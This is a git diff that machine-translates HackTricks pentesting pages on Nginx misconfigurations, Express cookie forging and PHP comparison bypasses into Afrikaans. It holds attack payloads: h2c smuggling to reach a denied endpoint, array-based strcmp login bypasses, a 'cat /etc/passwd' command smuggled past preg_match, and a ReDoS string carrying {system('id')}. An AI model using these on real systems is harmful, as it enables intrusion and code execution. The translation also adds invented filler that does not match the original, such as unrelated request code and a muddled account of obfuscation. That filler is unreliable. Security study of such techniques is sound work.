-DNS spoofing against Nginx is feasible under certain conditions. If an attacker knows the **DNS server** used by Nginx and can intercept its DNS queries, they can spoof DNS records. This method, however, is ineffective if Nginx is configured to use **localhost (127.0.0.1)** for DNS resolution. Nginx allows specifying a DNS server as follows:
+### **DNS Spoofing Kwesbaarheid**
 
+DNS-spoofing teen Nginx is moontlik onder sekere omstandighede. As 'n aanvaller die **DNS-bediener** wat deur Nginx gebruik word, ken en sy DNS-navrae kan onderskep, kan hulle DNS-rekords vervals. Hierdie metode is egter ondoeltreffend as Nginx gekonfigureer is om **localhost (127.0.0.1)** vir DNS-oplossing te gebruik. Nginx maak dit moontlik om 'n DNS-bediener as volg te spesifiseer:
 ```yaml
 resolver 8.8.8.8;
 ```
+### **`proxy_pass` en `internal` Direktiewe**
 
-### **`proxy_pass` and `internal` Directives**
-
-The **`proxy_pass`** directive is utilized for redirecting requests to other servers, either internally or externally. The **`internal`** directive ensures that certain locations are only accessible within Nginx. While these directives are not vulnerabilities by themselves, their configuration requires careful examination to prevent security lapses.
+Die **`proxy_pass`**-direktief word gebruik om versoek na ander bedieners te stuur, intern of ekstern. Die **`internal`**-direktief verseker dat sekere areas slegs binne Nginx toeganklik is. Alhoewel hierdie direktiewe nie opsigself kwesbaarhede is nie, vereis hul konfigurasie noukeurige ondersoek om sekuriteitsfoute te voorkom.
 
 ## proxy\_set\_header Upgrade & Connection
 
-If the nginx server is configured to pass the Upgrade and Connection headers an [**h2c Smuggling attack**](../../pentesting-web/h2c-smuggling.md) could be performed to access protected/internal endpoints.
+As die nginx-bediner gekonfigureer is om die Upgrade- en Connection-koptekens oor te dra, kan 'n [**h2c Smuggling-aanval**](../../pentesting-web/h2c-smuggling.md) uitgevoer word om toegang tot beskermde/intern eindpunte te verkry.
 
 {% hint style="danger" %}
-This vulnerability would allow an attacker to **stablish a direct connection with the `proxy_pass` endpoint** (`http://backend:9999` in this case) that whose content is not going to be checked by nginx.
+Hierdie kwesbaarheid sal 'n aanvaller in staat stel om 'n **direkte verbinding met die `proxy_pass`-eindpunt** (`http://backend:9999` in hierdie geval) te vestig waarvan die inhoud nie deur nginx nagegaan sal word nie.
 {% endhint %}
 
-Example of vulnerable configuration to steal `/flag` from [here](https://bishopfox.com/blog/h2c-smuggling-request):
-
+Voorbeeld van 'n kwesbare konfigurasie om `/flag` te steel van [hier](https://bishopfox.com/blog/h2c-smuggling-request):
 ```
 server {
-    listen       443 ssl;
-    server_name  localhost;
+listen       443 ssl;
+server_name  localhost;
 
-    ssl_certificate       /usr/local/nginx/conf/cert.pem;
-    ssl_certificate_key   /usr/local/nginx/conf/privkey.pem;
+ssl_certificate       /usr/local/nginx/conf/cert.pem;
+ssl_certificate_key   /usr/local/nginx/conf/privkey.pem;
 
-    location / {
-     proxy_pass http://backend:9999;
-     proxy_http_version 1.1;
-     proxy_set_header Upgrade $http_upgrade;
-     proxy_set_header Connection $http_connection;
-    }
+location / {
+proxy_pass http://backend:9999;
+proxy_http_version 1.1;
+proxy_set_header Upgrade $http_upgrade;
+proxy_set_header Connection $http_connection;
+}
 
-    location /flag {
-     deny all;
-    }
+location /flag {
+deny all;
+}
 ```
-
 {% hint style="warning" %}
-Note that even if the `proxy_pass` was pointing to a specific **path** such as `http://backend:9999/socket.io` the connection will be stablished with `http://backend:9999` so you can **contact any other path inside that internal endpoint. So it doesn't matter if a path is specified in the URL of proxy\_pass.**
+Let wel dat selfs as die `proxy_pass` na 'n spesifieke **pad** verwys, soos `http://backend:9999/socket.io`, die verbinding met `http://backend:9999` tot stand gebring sal word, sodat jy **enige ander pad binne daardie interne eindpunt kan kontak. Dit maak dus nie saak of 'n pad gespesifiseer word in die URL van proxy\_pass nie.**
 {% endhint %}
 
-## Try it yourself
+## Probeer dit self
 
-Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
+Detectify het 'n GitHub-opberging geskep waar jy Docker kan gebruik om jou eie kwesbare Nginx-toetsbediener op te stel met sommige van die verkeerde konfigurasies wat in hierdie artikel bespreek word, en probeer om hulle self te vind!
 
 [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx)
 
-## Static Analyzer tools
+## Statische analisehulpmiddels
 
 ### [GIXY](https://github.com/yandex/gixy)
 
-Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection.
+Gixy is 'n hulpmiddel om Nginx-konfigurasie te analiseer. Die hoofdoel van Gixy is om sekuriteitsverkeerde konfigurasie te voorkom en foutopsporing te outomatiseer.
 
 ### [Nginxpwner](https://github.com/stark0de/nginxpwner)
 
-Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
+Nginxpwner is 'n eenvoudige hulpmiddel om na algemene Nginx-verkeerde konfigurasies en kwesbaarhede te soek.
 
-## References
+## Verwysings
 
 * [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)
 * [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
@@ -259,20 +228,20 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsbeoordeling en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ hulpmiddels & funksies wat vanaf rekognisering tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel aangepaste hulpmiddels, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te laat spat en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opberge.
 
 

diff --git a/network-services-pentesting/pentesting-web/nodejs-express.md b/network-services-pentesting/pentesting-web/nodejs-express.md
index 96d0b27e6..437d0adfd 100644
--- a/network-services-pentesting/pentesting-web/nodejs-express.md
+++ b/network-services-pentesting/pentesting-web/nodejs-express.md
@@ -1,37 +1,95 @@
 # NodeJS Express
 
-## Cookie Signature
+## Koekie Handtekening
 
-The tool [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is a utility for automating the testing and re-signing of Express.js cookie secrets.
-
-### Single cookie with a specific name
+Die instrument [https://github.com/DigitalInterruption/cookie-monster](https://github.com/DigitalInterruption/cookie-monster) is 'n nut vir outomatiese toetsing en herondertekening van Express.js koekiegeheime.
 
+### Enkel koekie met 'n spesifieke naam
 ```bash
 cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session
 ```
+### Aangepaste woordenlys
 
-### Custom wordlist
+If you are conducting a penetration test on a web application built with Node.js and Express, you may want to create a custom wordlist to use in your attacks. A wordlist is a file that contains a list of words, which can be used for various purposes such as password cracking or brute-forcing.
 
+As a penetration tester, you can create a custom wordlist tailored to the specific target application you are testing. This can include common passwords, usernames, or any other relevant keywords that may be used by the application's users.
+
+To create a custom wordlist, you can start by brainstorming potential keywords that may be relevant to the target application. This can include words related to the application's industry, specific technologies used, or any other information that may be publicly available.
+
+Once you have a list of potential keywords, you can use various tools and techniques to generate different combinations and variations of these words. This can include adding numbers, special characters, or modifying the capitalization of the words.
+
+There are also tools available that can help you generate wordlists based on common patterns or rules. These tools can be useful for creating wordlists that follow specific password complexity requirements, such as including a certain number of uppercase letters, lowercase letters, numbers, or special characters.
+
+Once you have generated your custom wordlist, you can use it in various attacks during your penetration test. This can include password cracking attacks, username enumeration, or any other attack that requires a list of potential keywords.
+
+Remember to always obtain proper authorization before conducting any penetration testing activities, and to use the custom wordlist responsibly and ethically.
 ```bash
 cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst
 ```
+### Toets verskeie koekies deur middel van groepmodus
 
-### Test multiple cookies using batch mode
+Om die veiligheid van 'n webtoepassing te toets, is dit soms nodig om verskeie koekies te toets wat deur die toepassing gebruik word. Hierdie koekies kan verskillende toegangsniveaus of funksionaliteit verteenwoordig. 
 
+Met Node.js en Express kan jy 'n groepmodus gebruik om verskeie koekies te toets. Hier is 'n voorbeeld van hoe jy dit kan doen:
+
+```javascript
+const request = require('request');
+
+const cookies = [
+  'cookie1=value1',
+  'cookie2=value2',
+  'cookie3=value3'
+];
+
+const options = {
+  url: 'http://example.com',
+  headers: {
+    'Cookie': cookies.join('; ')
+  }
+};
+
+request(options, (error, response, body) => {
+  if (error) {
+    console.error(error);
+  } else {
+    console.log(body);
+  }
+});
+```
+
+In hierdie voorbeeld word die `request`-biblioteek gebruik om 'n HTTP-aanvraag na 'n webtoepassing te stuur. Die `cookies`-array bevat die verskeie koekies wat getoets moet word. Die `options`-objek bevat die URL van die webtoepassing en die `Cookie`-kop wat die koekies bevat. 
+
+Deur die koekies in die `Cookie`-kop te voeg deur middel van die `join`-metode, kan jy 'n enkele string van die koekies maak wat deur die webtoepassing gebruik sal word. 
+
+Die `request`-funksie stuur die HTTP-aanvraag en roep 'n terugroepfunksie aan wanneer die antwoord ontvang word. In hierdie voorbeeld word die antwoord se liggaam eenvoudig na die konsole uitgevoer, maar jy kan dit aanpas om die nodige toetslogika uit te voer.
+
+Met hierdie benadering kan jy verskeie koekies toets en die reaksie van die webtoepassing analiseer om enige potensiële kwesbaarhede of probleme te identifiseer.
 ```bash
 cookie-monster -b -f cookies.json
 ```
+### Toets verskeie koekies deur middel van lotmodus met 'n aangepaste woordelys
 
-### Test multiple cookies using batch mode with a custom wordlist
+Om verskeie koekies te toets deur middel van lotmodus met 'n aangepaste woordelys, kan jy die volgende stappe volg:
 
+1. Skep 'n woordelys met moontlike koekiewaardes wat jy wil toets.
+2. Stoor die woordelys in 'n tekslêer, byvoorbeeld `cookies.txt`.
+3. Gebruik 'n hulpmiddel soos cURL of een van die verskeie HTTP-kliënte om 'n versoek na die doelwebwerf te stuur. Byvoorbeeld:
+
+```bash
+curl -b cookies.txt https://www.example.com
+```
+
+4. Analiseer die HTTP-antwoord om te bepaal of die koekie geldig is of nie. Jy kan kyk na die statuskode, inhoud van die antwoord, of enige ander relevante inligting.
+5. Herhaal die proses vir elke moontlike koekiewaarde in jou woordelys.
+
+Deur hierdie stappe te volg, kan jy verskeie koekies toets deur middel van lotmodus met 'n aangepaste woordelys. Dit kan jou help om potensiële kwesbaarhede of swakheid in die koekiehantering van die webwerf te identifiseer.
 ```bash
 cookie-monster -b -f cookies.json -w custom.lst
 ```
+### Enkodeer en teken 'n nuwe koekie
 
-### Encode and sign a new cookie
-
-iI you know the secret you can sign a the cookie.
-
+As jy die geheim ken, kan jy die koekie teken.
 ```bash
 cookie-monster -e -f new_cookie.json -k secret
 ```
+
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index a19307868..f5b4af8ae 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -1,64 +1,59 @@
-# PHP Tricks
+# PHP Truuks
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Cookies common location:
+## Koekies algemene plek:
 
-This is also valid for phpMyAdmin cookies.
-
-Cookies:
+Dit is ook geldig vir phpMyAdmin-koekies.
 
+Koekies:
 ```
 PHPSESSID
 phpMyAdmin
 ```
-
-Locations:
-
+Liggings:
 ```
 /var/lib/php/sessions
 /var/lib/php5/
 /tmp/
 Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e
 ```
+## Omseil PHP-vergelykings
 
-## Bypassing PHP comparisons
+### Los vergelykings/Type Juggling ( == )
 
-### Loose comparisons/Type Juggling ( == )
+As `==` in PHP gebruik word, is daar onverwagte gevalle waar die vergelyking nie soos verwag gedra nie. Dit is omdat "==" slegs waardes vergelyk wat na dieselfde tipe omskep is. As jy ook wil vergelyk dat die tipe van die vergelykte data dieselfde is, moet jy `===` gebruik.
 
-If `==` is used in PHP, then there are unexpected cases where the comparison doesn't behave as expected. This is because "==" only compare values transformed to the same type, if you also want to compare that the type of the compared data is the same you need to use `===`.
-
-PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
+PHP-vergelykingstabelle: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
 
 ![](<../../../.gitbook/assets/image (40) (1).png>)
 
 {% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
 
-* `"string" == 0 -> True` A string which doesn't start with a number is equals to a number
-* `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers)
-* `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0
-* `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0
-* `"0e12334" == "0" --> True` This is very interesting because in some cases you can control the string input of "0" and some content that is being hashed and compared to it. Therefore, if you can provide a value that will create a hash starting with "0e" and without any letter, you could bypass the comparison. You can find **already hashed strings** with this format here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
-* `"X" == 0 --> True` Any letter in a string is equals to int 0
+* `"string" == 0 -> True` 'n String wat nie met 'n nommer begin nie, is gelyk aan 'n nommer
+* `"0xAAAA" == "43690" -> True` Strings wat uit nommers in desimale of heksadesimale formaat bestaan, kan vergelyk word met ander nommers/strings met 'n True-resultaat as die nommers dieselfde was (nommers in 'n string word geïnterpreteer as nommers)
+* `"0e3264578" == 0 --> True` 'n String wat met "0e" begin en deur enigiets gevolg word, sal gelyk wees aan 0
+* `"0X3264578" == 0X --> True` 'n String wat met "0" begin en deur enige letter gevolg word (X kan enige letter wees) en deur enigiets gevolg word, sal gelyk wees aan 0
+* `"0e12334" == "0" --> True` Dit is baie interessant omdat jy in sommige gevalle die string-inset van "0" en 'n inhoud wat gehash en daarmee vergelyk word, kan beheer. Daarom, as jy 'n waarde kan voorsien wat 'n hash sal skep wat met "0e" begin en sonder enige letter is, kan jy die vergelyking omseil. Jy kan **reeds gehashte strings** met hierdie formaat hier vind: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
+* `"X" == 0 --> True` Enige letter in 'n string is gelyk aan int 0
 
-More info in [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
+Meer inligting by [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
 
 ### **in\_array()**
 
-**Type Juggling** also affects to the `in_array()` function by default (you need to set to true the third argument to make an strict comparison):
-
+**Type Juggling** beïnvloed ook die `in_array()`-funksie standaard (jy moet die derde argument op waar stel om 'n streng vergelyking te maak):
 ```php
 $values = array("apple","orange","pear","grape");
 var_dump(in_array(0, $values));
@@ -66,36 +61,30 @@ var_dump(in_array(0, $values));
 var_dump(in_array(0, $values, true));
 //False
 ```
-
 ### strcmp()/strcasecmp()
 
-If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
-
+Indien hierdie funksie gebruik word vir **enige verifikasie kontrole** (soos die wagwoordkontrole) en die gebruiker beheer een kant van die vergelyking, kan hy 'n leë reeks stuur in plaas van 'n string as die waarde van die wagwoord (`https://example.com/login.php/?username=admin&password[]=`) en hierdie kontrole omseil:
 ```php
 if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
 // Real Password
 if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
 // Real Password
 ```
+Dieselfde fout kom voor met `strcasecmp()`
 
-The same error occurs with `strcasecmp()`
-
-### Strict type Juggling
-
-Even if `===` is **being used** there could be errors that makes the **comparison vulnerable** to **type juggling**. For example, if the comparison is **converting the data to a different type of object before comparing**:
+### Streng tipe jonglering
 
+Selfs as `===` gebruik word, kan daar foute wees wat die vergelyking vatbaar maak vir tipe jonglering. Byvoorbeeld, as die vergelyking die data omskakel na 'n ander tipe objek voordat dit vergelyk word:
 ```php
 (int) "1abc" === (int) "1xyz" //This will be true
 ```
-
 ### preg\_match(/^.\*/)
 
-**`preg_match()`** could be used to **validate user input** (it **checks** if any **word/regex** from a **blacklist** is **present** on the **user input** and if it's not, the code can continue it's execution).
+**`preg_match()`** kan gebruik word om **gebruikersinvoer te valideer** (dit **kontroleer** of enige **woord/regex** van 'n **swartlys** teenwoordig is in die **gebruikersinvoer** en as dit nie is nie, kan die kode voortgaan met sy uitvoering).
 
-#### New line bypass
-
-However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send** the input in **several lines**, you could be able to bypass this check. Example:
+#### Nuwe lyn omseiling
 
+Maar wanneer die begin van die regexp bepaal word, **kontroleer `preg_match()` slegs die eerste lyn van die gebruikersinvoer**, dus as jy op een of ander manier die invoer in **verskeie lyne kan stuur**, kan jy hierdie kontrole omseil. Voorbeeld:
 ```php
 $myinput="aaaaaaa
 11111111"; //Notice the new line
@@ -108,48 +97,60 @@ echo preg_match("/^.*1/",$myinput);
 echo preg_match("/^.*1.*$/",$myinput);
 //0  --> In this scenario preg_match DOESN'T find the char "1"
 ```
-
-To bypass this check you could **send the value with new-lines urlencoded** (`%0A`) or if you can send **JSON data**, send it in **several lines**:
-
+Om hierdie kontrole te omseil, kan jy die waarde stuur met nuwe lyne urlencoded (`%0A`) of as jy JSON-data kan stuur, stuur dit in verskeie lyne:
 ```php
 {
-  "cmd": "cat /etc/passwd"
+"cmd": "cat /etc/passwd"
 }
 ```
+Vind 'n voorbeeld hier: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
 
-Find an example here: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice)
-
-#### **Length error bypass**
-
-(This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15)\
-If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass** the check. For example, if it is blacklisting a JSON you could send:
+#### **Lengte fout omseil**
 
+(Die omseil is blykbaar probeer op PHP 5.2.5 en ek kon dit nie werk kry op PHP 7.3.15 nie)\
+As jy 'n geldige baie **groot inset** na `preg_match()` kan stuur, sal dit **nie in staat wees om dit te verwerk** en jy sal in staat wees om die toets te **omseil**. Byvoorbeeld, as dit 'n JSON op 'n swartlys plaas, kan jy stuur:
 ```bash
 payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
 ```
-
-From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0)
-
 #### ReDoS Bypass
 
-Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
+Truuk vanaf: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
 
 
 

 
-In short the problem happens because the `preg_*` functions in PHP builds upon the [PCRE library](http://www.pcre.org/). In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the amount of recursions allowed, but in PHP this limit [defaults to 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) which is more than fits in the stack.
+In kort gebeur die probleem omdat die `preg_*` funksies in PHP bou op die [PCRE-biblioteek](http://www.pcre.org/). In PCRE word sekere regulêre uitdrukkings deur middel van baie herhalende oproepe aangepas, wat baie stakruimte gebruik. Dit is moontlik om 'n limiet te stel op die aantal herhalings wat toegelaat word, maar in PHP is hierdie limiet [standaard 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit), wat meer is as wat in die stak pas.
 
-[This Stackoverflow thread](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) was also linked in the post where it is talked more in depth about this issue. Our task was now clear:\
-**Send an input that would make the regex do 100\_000+ recursions, causing SIGSEGV, making the `preg_match()` function return `false` thus making the application think that our input is not malicious, throwing the surprise at the end of the payload something like `{system()}` to get SSTI --> RCE --> flag :)**.
-
-Well, in regex terms, we're not actually doing 100k "recursions", but instead we're counting "backtracking steps", which as the [PHP documentation](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) states it defaults to 1\_000\_000 (1M) in the `pcre.backtrack_limit` variable.\
-To reach that, `'X'*500_001` will result in 1 million backtracking steps (500k forward and 500k backwards):
+[Hierdie Stackoverflow-draad](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) is ook gekoppel in die pos waar daar meer in diepte oor hierdie probleem gepraat word. Ons taak was nou duidelik:\
+**Stuur 'n inset wat die regex 100\_000+ herhalings laat doen, wat SIGSEGV veroorsaak, die `preg_match()` funksie laat `false` terugkeer en sodoende die toepassing laat dink dat ons inset nie skadelik is nie, en aan die einde van die payload die verrassing gooi soos `{system()}` om SSTI --> RCE --> vlag te kry :)**.
 
+Wel, in regex-terme doen ons eintlik nie 100k "herhalings" nie, maar eerder tel ons "terugspoortreeks", wat soos die [PHP-dokumentasie](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) dit stel, standaard 1\_000\_000 (1M) is in die `pcre.backtrack_limit` veranderlike.\
+Om dit te bereik, sal `'X'*500_001` lei tot 1 miljoen terugspoortreeks (500k vorentoe en 500k agtertoe):
 ```python
 payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
 ```
-### Type Juggling for PHP obfuscation
+### Tipe Jonglering vir PHP obfuskasie
 
+Type jonglering is 'n tegniek wat gebruik word vir PHP obfuskasie. Dit behels die manipulasie van die tipe van 'n waarde om dit te laat lyk asof dit 'n ander tipe is. Hierdie tegniek kan gebruik word om kode te verberg en te verwar, wat dit moeiliker maak vir aanvallers om die ware funksionaliteit van die kode te verstaan.
+
+In PHP, word tipes geïdentifiseer deur die waardes wat hulle verteenwoordig. Byvoorbeeld, 'n string kan geïdentifiseer word deur aanhalingstekens rondom die waarde te plaas, terwyl 'n getal geen aanhalingstekens het nie. Deur die tipe van 'n waarde te manipuleer, kan 'n aanvaller die kode moeiliker maak om te ontleed en te verstaan.
+
+Hier is 'n voorbeeld van hoe tipe jonglering in PHP gebruik kan word:
+
+```php
+$var1 = "123";
+$var2 = 123;
+
+if ($var1 == $var2) {
+    echo "Die waardes is gelyk";
+} else {
+    echo "Die waardes is nie gelyk nie";
+}
+```
+
+In hierdie voorbeeld sal die uitset "Die waardes is gelyk" wees, alhoewel die twee veranderlikes verskillende tipes het. Dit is omdat PHP outomaties probeer om die tipes van die waardes aan te pas om hulle te vergelyk. Hierdie gedrag kan gebruik word om kode te obfuskasie deur die tipe van waardes te manipuleer.
+
+Dit is belangrik om te verstaan dat tipe jonglering nie 'n veilige manier is om kode te obfuskasie nie. Dit kan die kode moeiliker maak om te lees, maar dit sal nie die kode volledig beskerm teen 'n bekwame aanvaller nie. Dit is slegs een van die vele tegnieke wat gebruik kan word in 'n algehele obfuskasie-strategie.
 ```php
 $obfs = "1"; //string "1"
 $obfs++; //int 2
@@ -160,34 +161,30 @@ $obfs = 3+2 * (TRUE + TRUE); //int 7
 $obfs .= ""; //string "7"
 $obfs += ""; //int 7
 ```
+## Voer uit na omskakeling (EAR)
 
-## Execute After Redirect (EAR)
-
-If PHP is redirecting to another page but no **`die`** or **`exit`** function is **called after the header `Location`** is set, the PHP continues executing and appending the data to the body:
-
+As PHP na 'n ander bladsy omskakel, maar geen **`die`** of **`exit`** funksie word **geroep nadat die `Location`-kop ingestel is nie**, gaan PHP voort om uit te voer en die data aan die liggaam toe te voeg:
 ```php
 
 ```
+## Meer truuks
 
-## More tricks
-
-* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code.
-* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
-  This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
-* When you have the **usernames** of the users of the machine. Check the address: **/\~\** to see if the php directories are activated.
-* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
+* **register\_globals**: In **PHP < 4.1.1.1** of as dit verkeerd gekonfigureer is, kan **register\_globals** aktief wees (of hul gedrag word nageboots). Dit impliseer dat in globale veranderlikes soos $\_GET, as hulle 'n waarde het bv. $\_GET\["param"]="1234", kan jy dit toegang via **$param. Deur dus HTTP parameters te stuur, kan jy veranderlikes oorskryf** wat binne die kode gebruik word.
+* Die **PHPSESSION-koekies van dieselfde domein word in dieselfde plek gestoor**, daarom as binne 'n domein **verskillende koekies in verskillende paaie gebruik word**, kan jy maak dat 'n paadjie **die koekie van die paadjie toegang** deur die waarde van die ander paadjie se koekie in te stel.\
+Op hierdie manier, as **beide paadjies 'n veranderlike met dieselfde naam toegang**, kan jy maak dat die **waarde van daardie veranderlike in paadjie1 van toepassing is op paadjie2**. En dan sal paadjie2 die veranderlikes van paadjie1 as geldig beskou (deur die koekie die naam te gee wat daarmee ooreenstem in paadjie2).
